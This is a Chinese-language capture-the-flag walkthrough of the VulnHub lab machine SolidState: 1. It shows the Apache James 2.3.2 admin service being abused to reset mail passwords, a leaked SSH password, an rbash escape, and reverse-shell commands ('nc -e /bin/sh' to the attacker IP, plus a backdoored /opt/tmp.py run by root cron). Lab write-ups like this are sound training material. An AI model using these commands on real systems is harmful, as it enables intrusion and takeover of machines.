VulnHub-SolidState: 1

admin 2024年7月4日15:01:50评论12 views字数 1935阅读6分27秒阅读模式

 

VulnHub-SolidState: 1

靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/

靶机难度:中级(CTF)

靶机发布日期:2018年9月12日

靶机描述:

它最初是为HackTheBox创建的

目标:得到root权限&找到flag.txt

请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

VulnHub-SolidState: 1

 

 

VulnHub-SolidState: 1
VulnHub-SolidState: 1

一、信息收集

VulnHub-SolidState: 1

 

VulnHub-SolidState: 1我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:

VulnHub-SolidState: 1

我们已经找到了此次CTF目标计算机IP地址:

192.168.182.139

VulnHub-SolidState: 1

nmap发现了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(admin)端口是开放的...4555还是james-admin JAMES Remote Admin 2.3.2...存在漏洞

[链接](https://www.exploit-db.com/exploits/35513)

VulnHub-SolidState: 1

dirb和nikto,以及gobuster都没发现什么...

这边直接看看4555...这边需要用nc链接...因为是Remote Admin Service...

VulnHub-SolidState: 1

 

nc 192.168.182.139 4555

VulnHub-SolidState: 1

listusers命令可以发现服务器上的邮件列表...发现五个用户...

还能执行`setpassword [username]

输入密码查看隐藏内容

`

VulnHub-SolidState: 1

使用命令将五个用户都修改密码成dayu...方便我们去渗透...

现在有了pop3的用户名密码,进去看看...

VulnHub-SolidState: 1

john的邮件信息是祝我好运...没啥有用的..继续换...

VulnHub-SolidState: 1

可以看到James从管理员帐户向Mindy 发送了邮件,并共享了他的SSH登录凭据,在mindy用户邮件中看到了账号密码...pass:

P@55W0rd1!2@

VulnHub-SolidState: 1

成功登陆mindy用户...

VulnHub-SolidState: 1

可以看到mindy用户可以利用/bin/rbash/进行反向shell提权...或者利用前面nmap就知道了Apache James Server 2.3.2在运行着...并利用35513EXP进行渗透...

VulnHub-SolidState: 1

ssh mindy@192.168.182.139 "export TERM=xterm; python -c 'import pty; pty.spawn("/bin/sh")'"

直接利用一句话就能提权...

或者用:

VulnHub-SolidState: 1

在本地找就行,或者在exploit上下载也行...

VulnHub-SolidState: 1

这要做个修改...

VulnHub-SolidState: 1

nc -e /bin/sh 192.168.182.149 8000

  (攻击者IP)

VulnHub-SolidState: 1

python 35513.py 192.168.182.139

修改好后,直接执行即可...

VulnHub-SolidState: 1

VulnHub-SolidState: 1

重新ssh访问mindy用户后,直接本地开启8000监听即可...成功提权...还有各种方法原理是一样的,就不说了...

python -c 'import pty;pty.spawn("/bin/bash")'

VulnHub-SolidState: 1

在mindy用户下完成了第一个挑战,查看到了user内容...

VulnHub-SolidState: 1

ps aux | grep james

因为前面能进入mindy用户是通过James那里得到的提示,james发了邮件给mindy...这边我查看下james运行过程..

显示了opt作为根进程..进去看看

VulnHub-SolidState: 1

有个tmp.py程序应该可以利用下,试试

VulnHub-SolidState: 1

直接写入即可...

VulnHub-SolidState: 1

echo 'import os; os.system("/bin/nc 192.168.182.149 4444 -e /bin/bash")' > /opt/tmp.py
或者命令:echo "os.system('/bin/nc -e /bin/bash 192.168.182.149 4444')" >> tmp.py

或者在本地创建tmp.py文件,然后wget上传到tmp目录cp放到opt目录运行即可....

这边crontab在root的帐户下运行的,大约2~3分钟就会自动运行一次..等待即可...

VulnHub-SolidState: 1

成功提权...获得root权限查看flag....

 

 

VulnHub-SolidState: 1

这篇主要熟悉Apache James Server 2.3.2可利用漏洞...或者熟悉文件上传python利用也可以...最后就是找到用户底层可运行利用的py、php和sh等文件,进行修改利用即可...

由于我们已经成功得到root权限和flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

VulnHub-SolidState: 1
VulnHub-SolidState: 1

VulnHub-SolidState: 1

原文始发于微信公众号(大余安全):VulnHub-SolidState: 1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日15:01:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub-SolidState: 1https://cn-sec.com/archives/892333.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息